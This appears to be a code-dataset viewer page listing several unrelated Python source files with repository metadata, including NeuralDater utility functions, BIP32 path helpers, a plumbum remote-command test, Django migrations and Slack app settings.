[user, host] = args.userhost[0].split('@')
init(host, 0, 0, 0, user=user)
| 39.515152 | 166 | 0.67408 | 194 | 1,304 | 4.484536 | 0.479381 | 0.045977 | 0.032184 | 0.055172 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011278 | 0.184049 | 1,304 | 32 | 167 | 40.75 | 0.806391 | 0.068252 | 0 | 0 | 0 | 0.038462 | 0.235779 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0.038462 | 0.307692 | 0 | 0.384615 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
a225d4215664eb0e76d8e4f28cc69143c6d676df | 359 | py | Python | src/text_selection/cover_export.py | stefantaubert/text-selection | 4b3b49005cbeb2e9212ed94686d8e871c6c2c368 | [
"MIT"
] | null | null | null | src/text_selection/cover_export.py | stefantaubert/text-selection | 4b3b49005cbeb2e9212ed94686d8e871c6c2c368 | [
"MIT"
] | null | null | null | src/text_selection/cover_export.py | stefantaubert/text-selection | 4b3b49005cbeb2e9212ed94686d8e871c6c2c368 | [
"MIT"
] | null | null | null | from typing import List
from typing import OrderedDict as OrderedDictType
from typing import Set
from ordered_set import OrderedSet
from text_selection.cover_applied import cover_symbols
def cover_symbols_default(data: OrderedDictType[int, List[str]], symbols: Set[str]) -> OrderedSet[int]:
return cover_symbols(
data=data,
symbols=symbols,
)
| 23.933333 | 103 | 0.791086 | 48 | 359 | 5.770833 | 0.4375 | 0.108303 | 0.173285 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.142061 | 359 | 14 | 104 | 25.642857 | 0.899351 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.5 | 0.1 | 0.7 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
a227318e6a334fffff87d6e6e584338f480d2fab | 4,500 | py | Python | helper.py | prachir1501/NeuralDater | 3604443c73c4eba36fcfac37668fcc4c7039df63 | [
"Apache-2.0"
] | 64 | 2018-05-15T01:35:08.000Z | 2021-08-16T06:41:29.000Z | helper.py | prachir1501/NeuralDater | 3604443c73c4eba36fcfac37668fcc4c7039df63 | [
"Apache-2.0"
] | 16 | 2018-12-04T05:47:55.000Z | 2022-02-09T23:43:41.000Z | helper.py | prachir1501/NeuralDater | 3604443c73c4eba36fcfac37668fcc4c7039df63 | [
"Apache-2.0"
] | 15 | 2018-05-15T01:40:25.000Z | 2021-07-26T07:13:31.000Z | import numpy as np, sys, unicodedata, requests, os, random, pdb, requests, json, gensim
import matplotlib.pyplot as plt, uuid, time, argparse, pickle, operator
import logging, logging.config, itertools, pathlib
import scipy.sparse as sp
from collections import defaultdict as ddict
from random import randint
from pprint import pprint
from sklearn.metrics import precision_recall_fscore_support
np.set_printoptions(precision=4)
def checkFile(filename):
"""
Check whether file is present or not
Parameters
----------
filename: Path of the file to check
Returns
-------
"""
return pathlib.Path(filename).is_file()
def getEmbeddings(embed_loc, wrd_list, embed_dims):
"""
Gives embedding for each word in wrd_list
Parameters
----------
embed_loc: Path to embedding file
wrd_list: List of words for which embedding is required
embed_dims: Dimension of the embedding
Returns
-------
embed_matrix: (len(wrd_list) x embed_dims) matrix containing embedding for each word in wrd_list in the same order
"""
embed_list = []
model = gensim.models.KeyedVectors.load_word2vec_format(embed_loc, binary=False)
for wrd in wrd_list:
if wrd in model.vocab: embed_list.append(model.word_vec(wrd))
else: embed_list.append(np.random.randn(embed_dims))
return np.array(embed_list, dtype=np.float32)
def set_gpu(gpus):
"""
Sets the GPU to be used for the run
Parameters
----------
gpus: List of GPUs to be used for the run
Returns
-------
"""
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"] = gpus
def debug_nn(res_list, feed_dict):
"""
Function for debugging Tensorflow model
Parameters
----------
res_list: List of tensors/variables to view
feed_dict: Feed dict required for getting values
Returns
-------
Returns the list of values of given tensors/variables after execution
"""
import tensorflow as tf
config = tf.ConfigProto()
config.gpu_options.allow_growth=True
sess = tf.Session(config=config)
sess.run(tf.global_variables_initializer())
summ_writer = tf.summary.FileWriter("tf_board/debug_nn", sess.graph)
res = sess.run(res_list, feed_dict = feed_dict)
pdb.set_trace()
def get_logger(name, log_dir, config_dir):
"""
Creates a logger object
Parameters
----------
name: Name of the logger file
log_dir: Directory where logger file needs to be stored
config_dir: Directory from where log_config.json needs to be read
Returns
-------
A logger object which writes to both file and stdout
"""
config_dict = json.load(open( config_dir + 'log_config.json'))
config_dict['handlers']['file_handler']['filename'] = log_dir + name.replace('/', '-')
logging.config.dictConfig(config_dict)
logger = logging.getLogger(name)
std_out_format = '%(asctime)s - [%(levelname)s] - %(message)s'
consoleHandler = logging.StreamHandler(sys.stdout)
consoleHandler.setFormatter(logging.Formatter(std_out_format))
logger.addHandler(consoleHandler)
return logger
def partition(inp_list, n):
"""
Paritions a given list into chunks of size n
Parameters
----------
inp_list: List to be splittted
n: Number of equal partitions needed
Returns
-------
Splits inp_list into n equal chunks
"""
division = len(inp_list) / float(n)
return [ inp_list[int(round(division * i)): int(round(division * (i + 1)))] for i in range(n) ]
def getChunks(inp_list, chunk_size):
"""
Splits inp_list into lists of size chunk_size
Parameters
----------
inp_list: List to be splittted
chunk_size: Size of each chunk required
Returns
-------
chunks of the inp_list each of size chunk_size, last one can be smaller (leftout data)
"""
return [inp_list[x:x+chunk_size] for x in range(0, len(inp_list), chunk_size)]
def mergeList(list_of_list):
"""
Merges list of list into a list
Parameters
----------
list_of_list: List of list
Returns
-------
A single list (union of all given lists)
"""
return list(itertools.chain.from_iterable(list_of_list)) | 28.66242 | 115 | 0.639778 | 587 | 4,500 | 4.751278 | 0.367973 | 0.027608 | 0.017928 | 0.014342 | 0.057368 | 0.057368 | 0.045177 | 0 | 0 | 0 | 0 | 0.001789 | 0.254667 | 4,500 | 157 | 116 | 28.66242 | 0.829756 | 0 | 0 | 0 | 0 | 0 | 0.06906 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.191489 | null | null | 0.042553 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bf422087326ad1d8b6d00ce1855d37c1b494e173 | 288 | py | Python | tests/_test_paramiko.py | weka-io/plumbum | 2d244c02f38498cacfb3519bdebe42e4c5dc72b3 | [
"MIT"
] | 1 | 2021-03-25T21:13:13.000Z | 2021-03-25T21:13:13.000Z | tests/_test_paramiko.py | weka-io/plumbum | 2d244c02f38498cacfb3519bdebe42e4c5dc72b3 | [
"MIT"
] | null | null | null | tests/_test_paramiko.py | weka-io/plumbum | 2d244c02f38498cacfb3519bdebe42e4c5dc72b3 | [
"MIT"
] | null | null | null | from plumbum.paramiko_machine import ParamikoMachine as PM
from plumbum import local
local.env.path.append("c:\\progra~1\\git\\bin")
from plumbum.cmd import ls, grep
m=PM("192.168.1.143")
mls=m["ls"]
mgrep=m["grep"]
#(mls | mgrep["b"])()
(mls | grep["\\."])()
(ls | mgrep["\\."])()
| 16.941176 | 58 | 0.638889 | 46 | 288 | 3.978261 | 0.586957 | 0.180328 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.043307 | 0.118056 | 288 | 16 | 59 | 18 | 0.677165 | 0.069444 | 0 | 0 | 0 | 0 | 0.177358 | 0.083019 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
bf4389979bbeb1ecafb87741b50b5595107dacec | 1,521 | py | Python | tilapia/lib/basic/bip32.py | huazhouwang/python_multichain_wallet | 52e0acdc2984c08990cb36433ef17a414fbe8312 | [
"MIT"
] | 2 | 2021-09-23T13:47:08.000Z | 2021-09-24T02:39:14.000Z | tilapia/lib/basic/bip32.py | huazhouwang/tilapia | 52e0acdc2984c08990cb36433ef17a414fbe8312 | [
"MIT"
] | null | null | null | tilapia/lib/basic/bip32.py | huazhouwang/tilapia | 52e0acdc2984c08990cb36433ef17a414fbe8312 | [
"MIT"
] | null | null | null | from typing import List, Optional
BIP32_PRIME = 0x80000000
UINT32_MAX = (1 << 32) - 1
def decode_bip44_path(path: str) -> List[int]:
def _parse_node(node: str) -> Optional[int]:
if not node or node == "m" or node == "M":
return None
is_hardened = node.endswith("'") or node.endswith("h")
node = node[:-1] if is_hardened else node
try:
child_index = int(node)
except ValueError:
child_index = None
if child_index is None:
return None
if is_hardened:
child_index = child_index | BIP32_PRIME
if not (0 <= child_index <= UINT32_MAX):
raise ValueError(f"bip32 path child index out of range: {child_index}")
return child_index
nodes = path.split("/")
nodes = (_parse_node(i) for i in nodes)
nodes = (i for i in nodes if i is not None)
return list(nodes)
def encode_bip32_path(path_as_ints: List[int]) -> str:
nodes = ["m"]
for child_index in path_as_ints:
if not isinstance(child_index, int):
raise TypeError(f"bip32 path child index must be int: {child_index}")
if not (0 <= child_index <= UINT32_MAX):
raise ValueError(f"bip32 path child index out of range: {child_index}")
prime = ""
if child_index & BIP32_PRIME:
prime = "'"
child_index = child_index ^ BIP32_PRIME
node = f"{child_index}{prime}"
nodes.append(node)
return "/".join(nodes)
| 29.25 | 83 | 0.593688 | 208 | 1,521 | 4.153846 | 0.269231 | 0.231481 | 0.052083 | 0.069444 | 0.305556 | 0.25463 | 0.185185 | 0.185185 | 0.185185 | 0.185185 | 0 | 0.037736 | 0.30309 | 1,521 | 51 | 84 | 29.823529 | 0.777358 | 0 | 0 | 0.157895 | 0 | 0 | 0.116371 | 0 | 0 | 0 | 0.006575 | 0 | 0 | 1 | 0.078947 | false | 0 | 0.026316 | 0 | 0.236842 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bf4417e992cda896f5b5d7ec9787891875aec0be | 2,070 | py | Python | pitronically/blog/migrations/0002_auto_20190719_1436.py | the16thpythonist/pitronically | 2f680f4e04a59fed7b410a4b8c26240c4efc5159 | [
"MIT"
] | null | null | null | pitronically/blog/migrations/0002_auto_20190719_1436.py | the16thpythonist/pitronically | 2f680f4e04a59fed7b410a4b8c26240c4efc5159 | [
"MIT"
] | null | null | null | pitronically/blog/migrations/0002_auto_20190719_1436.py | the16thpythonist/pitronically | 2f680f4e04a59fed7b410a4b8c26240c4efc5159 | [
"MIT"
] | null | null | null | # Generated by Django 2.1.8 on 2019-07-19 14:36
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import filer.fields.image
import taggit.managers
class Migration(migrations.Migration):
initial = True
dependencies = [
('blog', '0001_initial'),
migrations.swappable_dependency(settings.FILER_IMAGE_MODEL),
('taggit', '0003_taggeditem_add_unique_index'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.AddField(
model_name='tutorial',
name='author',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='tutorial',
name='tags',
field=taggit.managers.TaggableManager(help_text='A comma-separated list of tags.', through='taggit.TaggedItem', to='taggit.Tag', verbose_name='Tags'),
),
migrations.AddField(
model_name='project',
name='author',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='project',
name='tags',
field=taggit.managers.TaggableManager(help_text='A comma-separated list of tags.', through='taggit.TaggedItem', to='taggit.Tag', verbose_name='Tags'),
),
migrations.AddField(
model_name='project',
name='thumbnail',
field=filer.fields.image.FilerImageField(on_delete=django.db.models.deletion.CASCADE, related_name='project_thumbnail', to=settings.FILER_IMAGE_MODEL),
),
migrations.AddField(
model_name='project',
name='thumbnail_preview',
field=filer.fields.image.FilerImageField(on_delete=django.db.models.deletion.CASCADE, related_name='project_thumbnail_preview', to=settings.FILER_IMAGE_MODEL),
),
]
| 39.056604 | 171 | 0.658937 | 228 | 2,070 | 5.811404 | 0.307018 | 0.036226 | 0.104151 | 0.122264 | 0.700377 | 0.666415 | 0.633962 | 0.582642 | 0.582642 | 0.582642 | 0 | 0.015567 | 0.224155 | 2,070 | 52 | 172 | 39.807692 | 0.809465 | 0.021739 | 0 | 0.577778 | 1 | 0 | 0.153238 | 0.028176 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.111111 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bf4534497c74067b4ddb8a6599a853af99617d7a | 587 | py | Python | rest_slack/app_settings.py | jordaneremieff/django-rest-slack | 18d2662898c6d9408d7cbb573ffdbb5dad1fb1b3 | [
"MIT"
] | 1 | 2020-09-26T18:28:11.000Z | 2020-09-26T18:28:11.000Z | rest_slack/app_settings.py | jordaneremieff/django-rest-slack | 18d2662898c6d9408d7cbb573ffdbb5dad1fb1b3 | [
"MIT"
] | null | null | null | rest_slack/app_settings.py | jordaneremieff/django-rest-slack | 18d2662898c6d9408d7cbb573ffdbb5dad1fb1b3 | [
"MIT"
] | null | null | null | import os
from django.conf import settings
SLACK_CLIENT_ID = getattr(settings, 'SLACK_CLIENT_ID', os.environ.get('SLACK_CLIENT_ID'))
SLACK_CLIENT_SECRET = getattr(settings, 'SLACK_CLIENT_SECRET', os.environ.get('SLACK_CLIENT_SECRET'))
SLACK_VERIFICATION_TOKEN = getattr(settings, 'SLACK_VERIFICATION_TOKEN', os.environ.get('SLACK_VERIFICATION_TOKEN'))
SLACK_BOT_USER_TOKEN = getattr(settings, 'SLACK_BOT_USER_TOKEN', os.environ.get('SLACK_BOT_USER_TOKEN'))
REST_FRAMEWORK = getattr(settings, 'REST_FRAMEWORK', {'EXCEPTION_HANDLER': 'rest_framework.views.exception_handler'})
| 30.894737 | 117 | 0.807496 | 79 | 587 | 5.594937 | 0.278481 | 0.149321 | 0.180995 | 0.153846 | 0.20362 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.074957 | 587 | 18 | 118 | 32.611111 | 0.813996 | 0 | 0 | 0 | 0 | 0 | 0.383305 | 0.146508 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.285714 | 0 | 0.285714 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bf4d33f3d55caacf7fbaa981aaf614ce3ba88ed9 | 435 | py | Python | komax_app/migrations/0002_komax_group_of_square.py | UsernameForGerman/PrettlNKKomax | 8684300852458ab99988a63e49db47d53ff7ddc4 | [
"Apache-2.0"
] | null | null | null | komax_app/migrations/0002_komax_group_of_square.py | UsernameForGerman/PrettlNKKomax | 8684300852458ab99988a63e49db47d53ff7ddc4 | [
"Apache-2.0"
] | 9 | 2021-03-19T14:08:01.000Z | 2022-03-12T00:41:09.000Z | komax_app/migrations/0002_komax_group_of_square.py | UsernameForGerman/PrettlNKKomax | 8684300852458ab99988a63e49db47d53ff7ddc4 | [
"Apache-2.0"
] | null | null | null | # Generated by Django 2.2.7 on 2020-02-14 10:43
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('komax_app', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='komax',
name='group_of_square',
field=models.CharField(default='1 2 3', max_length=6),
preserve_default=False,
),
]
| 21.75 | 66 | 0.593103 | 50 | 435 | 5.02 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.074675 | 0.291954 | 435 | 19 | 67 | 22.894737 | 0.74026 | 0.103448 | 0 | 0 | 1 | 0 | 0.118557 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.076923 | 0 | 0.307692 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.